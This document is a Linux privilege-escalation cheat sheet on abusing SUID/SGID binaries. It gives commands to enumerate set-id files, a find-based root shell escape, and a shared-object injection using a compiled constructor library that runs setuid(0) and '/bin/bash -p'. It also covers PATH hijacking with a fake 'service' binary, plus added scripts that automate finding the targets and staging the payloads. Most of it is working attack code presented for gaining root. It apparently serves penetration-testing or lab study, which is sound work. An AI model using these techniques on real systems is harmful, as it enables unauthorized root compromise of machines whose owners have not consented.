
SUID / SGID

Find with +s

find /usr/bin -name find -exec /bin/bash -ip \;
  • only useful when find itself carries the SUID bit; the -p keeps the effective uid, without it bash drops back to your real uid

SUID Commands

find / -user root -perm /4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -name '*.txt' 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null > /tmp/suid
getcap -r / 2>/dev/null
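The one-liners above list every SUID/SGID file; on a real box most of them are stock (su, passwd, mount, ...). The script below is an added example, not part of the original page: it wraps the same find expression in two functions and flags only the files whose basename is not on a small allowlist of binaries that distributions normally ship SUID. The allowlist is an assumption and should be extended for the target.

```shell
#!/bin/sh
# Added example (not from the original page): enumerate SUID/SGID regular files under a
# root and flag the ones that are not normally SUID on a stock distribution.
# SUID_BASELINE is an assumed allowlist; anything flag_unusual prints deserves a closer
# look (version, known exploits, what it calls).

SUID_BASELINE="su sudo passwd mount umount newgrp chsh chfn gpasswd ping pkexec"

list_setid() {
    # $1: directory to search. Prints mode, owner, group and path of SUID/SGID regular
    # files. -xdev keeps find on one filesystem (skips /proc, /sys, network mounts).
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null
}

flag_unusual() {
    # $1: directory to search. Prints the path of each SUID/SGID file whose basename is
    # not in SUID_BASELINE.
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while read -r f; do
        b=$(basename "$f")
        case " $SUID_BASELINE " in
            *" $b "*) ;;                    # normally SUID: skip
            *) printf '%s\n' "$f" ;;
        esac
    done
}

# Usage on a real system:
#   list_setid /      # full listing, as with the find one-liners above
#   flag_unusual /    # only the unexpected ones
```

Capabilities are a separate channel (getcap -r / above) and are not covered by the permission bits this script checks.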

SUID / SGID Executables - Known Exploits

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
  • try to find an existing exploit for the findings (focus on items with a known version) on https://www.exploit-db.com

SUID / SGID Executables - Shared Object Injection

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace <program-location> 2>&1 | grep -iE "open|access|no such file"
  • Run strace on the file and search the output for open/access calls and for "no such file" errors
  • If the log shows that an external dependency is missing (e.g. /home/user/.config/libcalc.so) and its directory is writable by you, recreate the library with your own code
  • Check whether you can overwrite an existing library that the program loads from a writable path
  • The kernel ignores the set-id bit while a process is being traced, so strace runs the program as you; the paths it looks up are still visible
  • The dynamic loader ignores LD_PRELOAD and LD_LIBRARY_PATH for set-id programs, so this only works when the program itself loads a library from a path you control (dlopen, RPATH/RUNPATH)
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c 
libcalc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid */

/* constructor: runs as soon as the SUID program loads the library */
static void inject() __attribute__((constructor));

void inject() {
        setuid(0);              /* euid is already 0; make the real uid 0 too so bash keeps it */
        system("/bin/bash -p");
}
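The strace step above is the part that takes the most reading on a real target. The script below is an added example, not part of the original page: it pulls every path the program tried and failed to open (ENOENT) out of strace output and keeps only those whose parent directory the current user can write to, i.e. the places where the libcalc.so trick above can be planted. SAMPLE_TRACE is a constructed excerpt in strace's output format.

```shell
#!/bin/sh
# Added example (not from the original page): triage strace output for missing files
# that we could create. SAMPLE_TRACE is constructed for illustration.

SAMPLE_TRACE='openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/home/user/.config/libcalc.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)'

missing_paths() {
    # stdin: strace output. Prints the quoted path of every call that failed with ENOENT.
    grep 'ENOENT' | sed -n 's/.*"\([^"]*\)".*/\1/p'
}

writable_missing_paths() {
    # stdin: strace output. Prints the ENOENT paths whose parent directory exists and is
    # writable by us. (A missing parent under a writable ancestor is not handled here.)
    missing_paths | while read -r p; do
        dir=$(dirname "$p")
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$p"
        fi
    done
}

trace_and_triage() {
    # $1: SUID/SGID binary. The kernel drops the set-id bit while a process is traced,
    # so the program runs with our own uid, but its file lookups are still visible.
    # %file selects every syscall that takes a path (open, openat, access, stat, ...).
    strace -f -e trace=%file "$1" 2>&1 >/dev/null | writable_missing_paths
}

# On the constructed sample nothing is writable unless you are "user":
#   printf '%s\n' "$SAMPLE_TRACE" | writable_missing_paths
# On a real target:
#   trace_and_triage /usr/local/bin/suid-so
```

Each path it prints is a candidate for the gcc -shared step above: compile the constructor library and drop it at exactly that path, then run the program normally (not under strace) so the set-id bit is honoured.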

SUID / SGID Executables - Environment Variables

Run strings on the file to list the printable strings it contains (commands it runs, paths, version banners)

strings /usr/local/bin/suid-env

One line ("service apache2 start") suggests that service is being called to start the webserver, but by name rather than by its full path (/usr/sbin/service). The binary that actually runs is therefore whichever service is found first on PATH, which we control. This only works if the program does not reset PATH before calling system().

gcc -o /tmp/hack-lib/service /home/user/tools/suid/service.c   (create /tmp/hack-lib first)

service.c

#include <stdlib.h>   /* system */
#include <unistd.h>   /* setuid */

int main() {
        setuid(0);              /* euid is already 0; make the real uid 0 too so bash keeps it */
        system("/bin/bash -p");
}

prepend the directory to PATH (export it so the SUID program inherits the new value)

export PATH=/tmp/hack-lib:$PATH

run to get root

/usr/local/bin/suid-env
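The procedure above is done by eye: read the strings output, spot a command run by name, stage a replacement, fix PATH. The script below is an added example, not part of the original page, that does the same mechanically. relative_commands keeps only the strings lines whose first word resolves through PATH and is not given as a path; stage_hijack writes the page's service.c payload under the chosen name, compiles it when gcc is available, and prints the export line. /tmp/hack-lib and the suid-env binary are the page's names; the function names are mine.

```shell
#!/bin/sh
# Added example (not from the original page): find PATH-hijack candidates in `strings`
# output and stage a replacement binary for one of them.

relative_commands() (
    # stdin: output of `strings <binary>`. Prints each line whose first word contains no
    # '/' and resolves through PATH, i.e. a command the program runs by name.
    set -f                                  # no globbing while splitting the line
    while read -r line; do
        set -- $line                        # $1 = first word
        [ -n "${1:-}" ] || continue
        case "$1" in */*) continue ;; esac  # given as a path: not PATH-resolved
        if command -v "$1" >/dev/null 2>&1; then
            printf '%s\n' "$line"
        fi
    done
)

stage_hijack() {
    # $1: command name to shadow (e.g. service), $2: directory to stage into.
    # Writes the C payload as $2/$1.c, compiles it to $2/$1 if gcc is present, and prints
    # the export line that puts $2 first on PATH. setuid(0) is needed because the SUID
    # program has euid 0 but our real uid, and bash drops euid to ruid unless it is run
    # with -p and ruid is also 0.
    mkdir -p "$2"
    cat > "$2/$1.c" <<'EOF'
#include <stdlib.h>
#include <unistd.h>
int main(void) { setuid(0); return system("/bin/bash -p"); }
EOF
    if command -v gcc >/dev/null 2>&1; then
        gcc -o "$2/$1" "$2/$1.c"
    fi
    printf 'export PATH=%s:$PATH\n' "$2"
}

# On a real target:
#   strings /usr/local/bin/suid-env | relative_commands   # e.g. "service apache2 start"
#   eval "$(stage_hijack service /tmp/hack-lib)"          # build payload, prepend to PATH
#   /usr/local/bin/suid-env                               # runs our service as root
```

Every line relative_commands prints is a candidate, not a confirmed hit: the word may be data rather than an argument to system() or execvp(), and the program may reset PATH or use an absolute path elsewhere. Confirm with strace (execve lines) before relying on it.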